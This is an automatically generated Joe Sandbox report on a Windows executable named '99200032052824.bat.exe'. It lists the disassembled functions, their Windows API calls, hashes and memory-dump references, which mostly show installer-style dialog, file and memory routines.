Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy
String ID:
API String ID: 852173138-0
Opcode ID: c2f5824b60f5c09b1eb3f41acbdf16276bbc49783599cc0063a3f57f971a0cb3
Instruction ID: ed4532af69efc4a96380670f8aa125b9b2ed919e111b8f9bbc344a459732e5c1
Opcode Fuzzy Hash: c2f5824b60f5c09b1eb3f41acbdf16276bbc49783599cc0063a3f57f971a0cb3
Instruction Fuzzy Hash: C112BE71D0420A9FDB11AFA4C9867AEBBF4FB0A305F94852FD197E3288D7709942CB40

Function 004026FE Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
Instruction ID: 54a63a0b970f9f74e56537ecc54aa136cf23b82a2183361db5dda5742450debe
Opcode Fuzzy Hash: 9a9d642bc180ce2e42395307b113c5168d8877eeb496379f1d9827102d39ec81
Instruction Fuzzy Hash: 83F0EC72604151DBD700E7A49949DFEB76CDF11324FA0057BE181F20C1CABC8A459B3A

Function 0040677D Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
Instruction ID: c7d8350576d698755b4cacea6fe682166efb8a165fc05e4c5726b7f1812f50b8
Opcode Fuzzy Hash: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
Instruction Fuzzy Hash: F4E17971900706DFDB24CF58C880BAAB7F5FB44305F15842EE897A7291E738AA95CF54

Function 00406F54 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction ID: bf128a229d130661f6540426524f772d2f37fab74758cf72108bd9da8b00e916
Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
Instruction Fuzzy Hash: 22C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95

Function 004041AA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404235
GetDlgItem.USER32(00000000,000003E8), ref: 00404249
SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404267
GetSysColor.USER32(?), ref: 00404278
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
lstrlenA.KERNEL32(?), ref: 00404299
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
GetDlgItem.USER32(?,0000040A), ref: 0040431F
SendMessageA.USER32(00000000), ref: 00404322
GetDlgItem.USER32(?,000003E8), ref: 0040434D
SendMessageA.USER32(00000000,?,00000000,00000201), ref: 0040438D
LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
SetCursor.USER32(00000000), ref: 004043A5
LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
SetCursor.USER32(00000000), ref: 004043BE
SendMessageA.USER32(00000111,?,00000000), ref: 004043EA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE

Strings

Call, xrefs: 00404378
uA@, xrefs: 004043A9
N, xrefs: 0040433B

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$uA@
API String ID: 3103080414-2405949017
Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Inquiring Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Inquiring Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Inquiring Setup
API String ID: 941294808-1460695295
Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4

Function 00405C0F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49

Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0

GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
wsprintfA.USER32 ref: 00405C84
GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
GlobalFree.KERNEL32(00000000), ref: 00405D6D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74

Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\99200032052824.bat.exe,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F

Strings

%s=%s, xrefs: 00405C7A
[Rename], xrefs: 00405CEE, 00405D00

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
Opcode Fuzzy Hash: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD

Function 0040620A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\99200032052824.bat.exe",75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406262
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
CharNextA.USER32(?,"C:\Users\user\Desktop\99200032052824.bat.exe",75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406274
CharPrevA.USER32(?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000,004031E7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00406284

Strings

*?|<>/":, xrefs: 00406252
C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B
"C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 00406246

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3312408236
Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE

Function 004040A6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040C3
GetSysColor.USER32(00000000), ref: 00404101
SetTextColor.GDI32(?,00000000), ref: 0040410D
SetBkMode.GDI32(?,?), ref: 00404119
GetSysColor.USER32(?), ref: 0040412C
SetBkColor.GDI32(?,?), ref: 0040413C
DeleteObject.GDI32(?), ref: 00404156
CreateBrushIndirect.GDI32(?), ref: 00404160

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54

Function 73A32498 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 73A31215: GlobalAlloc.KERNEL32(00000040,73A31233,?,73A312CF,-73A3404B,73A311AB,-000000A0), ref: 73A3121D

GlobalFree.KERNEL32(?), ref: 73A3259E
GlobalFree.KERNEL32(00000000), ref: 73A325D8

Memory Dump Source

Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true

Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: f2f60c32bbb92daeac59836a621709219176288ce7ef6f4704fd79737610055e
Instruction ID: 2aa58f49c6ae5e0c037479bed560f4313d9be29048b2d58ed42f69d866608d7a
Opcode Fuzzy Hash: f2f60c32bbb92daeac59836a621709219176288ce7ef6f4704fd79737610055e
Instruction Fuzzy Hash: FA412672608209EFD302DF54CD97E6A77BAEF8B300B94052EF54683258C7399E05CB61

Function 00404992 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
GetMessagePos.USER32 ref: 004049B5
ScreenToClient.USER32(?,?), ref: 004049CF
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07

Strings

f, xrefs: 004049E3

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4

Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C97
MulDiv.KERNEL32(00084C9B,00000064,00084C9F), ref: 00402CC2
wsprintfA.USER32 ref: 00402CD2
SetWindowTextA.USER32(?,?), ref: 00402CE2
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4

Strings

verifying installer: %d%%, xrefs: 00402CCC

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58

Function 73A322B1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 73A32407

Part of subcall function 73A31224: lstrcpynA.KERNEL32(00000000,?,73A312CF,-73A3404B,73A311AB,-000000A0), ref: 73A31234

GlobalAlloc.KERNEL32(00000040,?), ref: 73A32382
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73A32397
GlobalAlloc.KERNEL32(00000040,00000010), ref: 73A323A8
CLSIDFromString.OLE32(00000000,00000000), ref: 73A323B6
GlobalFree.KERNEL32(00000000), ref: 73A323BD

Memory Dump Source

Source File: 00000005.00000002.1296192236647.0000000073A31000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A30000, based on PE: true

Associated: 00000005.00000002.1296192176706.0000000073A30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192283845.0000000073A33000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1296192329453.0000000073A35000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_73a30000_99200032052824.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 489e482dfbe3cfe296f7db3a74015902564210d16400fbf4543976ff686b96e5
Instruction ID: 9929c434d2c0636bb25cddfd297c61be7263b3c6216fec58829f6012da3d08d5
Opcode Fuzzy Hash: 489e482dfbe3cfe296f7db3a74015902564210d16400fbf4543976ff686b96e5
Instruction Fuzzy Hash: 8A417C71508309DFE315AF65DD42BAAB7F8FB46311F90882FF446C6288D7349545CBA2

Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
GlobalFree.KERNEL32(?), ref: 004027EB
GlobalFree.KERNEL32(00000000), ref: 004027FE
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A

Memory Dump Source

Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd

